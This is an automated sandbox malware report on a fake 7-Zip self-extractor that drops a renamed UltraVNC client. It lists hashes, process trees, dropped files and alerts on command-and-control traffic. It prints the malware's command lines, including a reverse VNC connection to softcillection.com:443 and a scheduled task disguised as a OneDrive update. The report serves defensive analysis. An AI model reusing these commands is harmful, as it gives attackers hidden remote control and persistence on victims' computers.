File name:

7ZSfxMod_x86.exe

Full analysis: https://app.any.run/tasks/af8fb06f-4565-4800-9392-2c289a59b96c
Verdict: Malicious activity
Analysis date: September 26, 2023, 11:39:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
vnc
suspicious
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

532AC56AB8F092CAF5FE714956DD3D2C

SHA1:

9D0B6245900A141D75FA19AB063AB6E874035D92

SHA256:

FBB6D99412B83621DC8F5293D42EBC75546D9144CAB5F43FDDC40D3F0C61DAAC

SSDEEP:

49152:xF6Ow+i/cx6iIybvy0B7CsbDMmSZhQQd84MSL6I3kL+97t5m6WUmSNtjQz0:xw/c8PybvnyNMG6dL6J59LZtjQo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • OneDrives.exe (PID: 836)
      • OneDrives.exe (PID: 280)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 984)
    • VNC was detected

      • OneDrives.exe (PID: 836)
    • Connects to the CnC server

      • OneDrives.exe (PID: 836)
  • SUSPICIOUS

    • Reads the Internet Settings

      • 7ZSfxMod_x86.exe (PID: 2552)
    • Starts CMD.EXE for commands execution

      • 7ZSfxMod_x86.exe (PID: 2552)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 984)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 984)
    • Executing commands from ".cmd" file

      • 7ZSfxMod_x86.exe (PID: 2552)
  • INFO

    • Reads the computer name

      • 7ZSfxMod_x86.exe (PID: 2552)
      • OneDrives.exe (PID: 836)
      • OneDrives.exe (PID: 280)
    • Create files in a temporary directory

      • 7ZSfxMod_x86.exe (PID: 2552)
    • Checks supported languages

      • 7ZSfxMod_x86.exe (PID: 2552)
      • OneDrives.exe (PID: 836)
      • OneDrives.exe (PID: 280)
    • The executable file from the user directory is run by the CMD process

      • OneDrives.exe (PID: 836)
      • OneDrives.exe (PID: 280)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

ProductVersion: 1.5.0.2712
ProductName: 7-Zip SFX
PrivateBuild: December 30, 2012
OriginalFileName: 7ZSfxMod_x86.exe
LegalCopyright: Copyright © 2005-2012 Oleg N. Scherbakov
InternalName: 7ZSfxMod
FileVersion: 1.5.0.2712
FileDescription: 7z Setup SFX (x86)
CompanyName: Oleg N. Scherbakov
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Windows NT 32-bit
FileFlags: Private build
FileFlagsMask: 0x003f
ProductVersionNumber: 1.5.0.2712
FileVersionNumber: 1.5.0.2712
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x1382f
UninitializedDataSize: -
InitializedDataSize: 187392
CodeSize: 78336
LinkerVersion: 8
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, 32-bit
TimeStamp: 2012:12:30 08:49:49+00:00
MachineType: Intel 386 or later, and compatibles
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
17
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start 7zsfxmod_x86.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs timeout.exe no specs excel.exe no specs schtasks.exe no specs timeout.exe no specs timeout.exe no specs taskkill.exe no specs timeout.exe no specs #VNC onedrives.exe timeout.exe no specs schtasks.exe no specs onedrives.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
280"C:\Users\admin\AppData\Local\Temp\OneDrives.exe" -autoreconnect -id:5634_USER-PC -connect softcillection.com:443C:\Users\admin\AppData\Local\Temp\OneDrives.execmd.exe
User:
admin
Company:
UltraVNC
Integrity Level:
MEDIUM
Description:
OneDriver
Exit code:
0
Version:
1.1.9.4
Modules
Images
c:\users\admin\appdata\local\temp\onedrives.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\kernel32.dll
464taskkill /f /im OneDrives.exeC:\Windows\SysWOW64\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
836"C:\Users\admin\AppData\Local\Temp\OneDrives.exe" C:\Users\admin\AppData\Local\Temp\OneDrives.exe
cmd.exe
User:
admin
Company:
UltraVNC
Integrity Level:
MEDIUM
Description:
OneDriver
Exit code:
0
Version:
1.1.9.4
Modules
Images
c:\users\admin\appdata\local\temp\onedrives.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
984"C:\Windows\System32\cmd.exe" /c cd C:\Users\admin\AppData\Local\Temp & idmt_j1h27dc7f5g3dy6s3d96sdx25.cmdC:\Windows\SysWOW64\cmd.exe7ZSfxMod_x86.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1248schtasks /create /f /tn "OneDrive Standalone Update Task-G-5-4-2023-120937178287-130937375508-082110380055-1304" /tr "C:\Users\admin\AppData\Local\Temp\OneDrives.exe" /sc daily /st 10:55C:\Windows\SysWOW64\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\ntdll.dll
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1480"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.4756.1000
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
1532timeout /t 2C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\syswow64\ntdll.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1604timeout /t 8C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2312timeout /t 4C:\Windows\SysWOW64\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2364"C:\Windows\System32\cmd.exe" /c ren idmt_j1h27dc7f5g3dy6s3d96sdx25 idmt_j1h27dc7f5g3dy6s3d96sdx25.cmdC:\Windows\SysWOW64\cmd.exe7ZSfxMod_x86.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
Total events
2 924
Read events
2 879
Write events
38
Delete events
7

Modification events

(PID) Process:(2552) 7ZSfxMod_x86.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2552) 7ZSfxMod_x86.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2552) 7ZSfxMod_x86.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2552) 7ZSfxMod_x86.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1480) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(1480) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
On
(PID) Process:(1480) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
On
(PID) Process:(1480) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
On
(PID) Process:(1480) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
On
(PID) Process:(1480) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
On
Executable files
7
Suspicious files
5
Text files
19
Unknown types
0

Dropped files

PID
Process
Filename
Type
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\MSRC4Plugin_for_sc.dsmexecutable
MD5:922E7761577DFC796D53589C630707B3
SHA256:4EBA9521CF0F739549940B4AC347FDC1A6399CA646831A9EF6CF3E15D47F91AD
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\GMmfbqfPpfSwfelfbzfovfUS.jpgtext
MD5:52055C6FABD51791E7ADF33A4B18CB69
SHA256:428CABE1837A67C8AA2901EB4383FF0EE93AFAF43AABCA64837C58FC010EAF8B
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\ZdZabcaMOaiuasVaKSaghaeb.jpgtext
MD5:A081BE4D317E49923EE3A38F938521A7
SHA256:1D441147B868E3397403BF59A1BC2B5C1927C6ECA1A467BC2FE68EB5E332A518
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\jhdytgslksjdh83.jpgtext
MD5:A8BFC9F4D2A65EA596481D6B576E41D4
SHA256:55B8FB521F80BB84BF71555B9B2DFFC23730C9986B423DE30AA155CCEC1BE03F
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\kjghdfncjduyta974jodutwbhdue72kvjfik.jpgtext
MD5:A081BE4D317E49923EE3A38F938521A7
SHA256:1D441147B868E3397403BF59A1BC2B5C1927C6ECA1A467BC2FE68EB5E332A518
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\AnELUtLhILTOLtHLBYLROLPu.jpgtext
MD5:A165920E79B7CD06D099C60F083D888F
SHA256:63C0C13912D2E97B7E745517812DF8EBF99A81A9D8F74119C72D04EFEEE5B494
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\UltraVNC.initext
MD5:E265D15A83E52B9CED30F6A9D747B388
SHA256:20B23CC90CBFBEF9BB7CEDFBB1B75F24A03BA96AF8C576263077501814DF6376
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\idmt_j1h27dc7f5g3dy6s3d96sdx25text
MD5:3B562C168B6B3AB020CE75CC976DB755
SHA256:0441FF97BB73A55AE1599C49E8E6F09EF77EB637936CFACDCD9DAAF3C4B372CB
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\rc4.keybinary
MD5:3A3BBDF24FB500BBD12DFE94BA84A007
SHA256:3225058AFBDF79B87D39A3BE884291D7BA4ED6EC93D1C2010399E11962106D5B
25527ZSfxMod_x86.exeC:\Users\admin\AppData\Local\Temp\7ZipSfx.000\ljhdynahdlfouypdhfy9763-072bkludfhjk.jpgtext
MD5:34CB509725E80E00F625E984CC612827
SHA256:42DCF90E058463B64BD65F8961AB3EA292082291BC58B79B5388E51A6AAA7DF4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
12
DNS requests
1
Threats
6

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
332
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
unknown
1208
svchost.exe
239.255.255.250:3702
whitelisted
4
System
192.168.100.255:138
whitelisted
1208
svchost.exe
239.255.255.250:1900
whitelisted
836
OneDrives.exe
188.120.249.17:443
softcillection.com
JSC IOT
RU
unknown

DNS requests

Domain
IP
Reputation
softcillection.com
  • 188.120.249.17
unknown

Threats

PID
Process
Class
Message
836
OneDrives.exe
Malware Command and Control Activity Detected
ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon
836
OneDrives.exe
Potential Corporate Privacy Violation
SUSPICIOUS [ANY.RUN] VNC negotiation was detected (ProtocolVersion message)
836
OneDrives.exe
Malware Command and Control Activity Detected
ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon
836
OneDrives.exe
Malware Command and Control Activity Detected
ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon
836
OneDrives.exe
Malware Command and Control Activity Detected
ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon
836
OneDrives.exe
Malware Command and Control Activity Detected
ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon
No debug info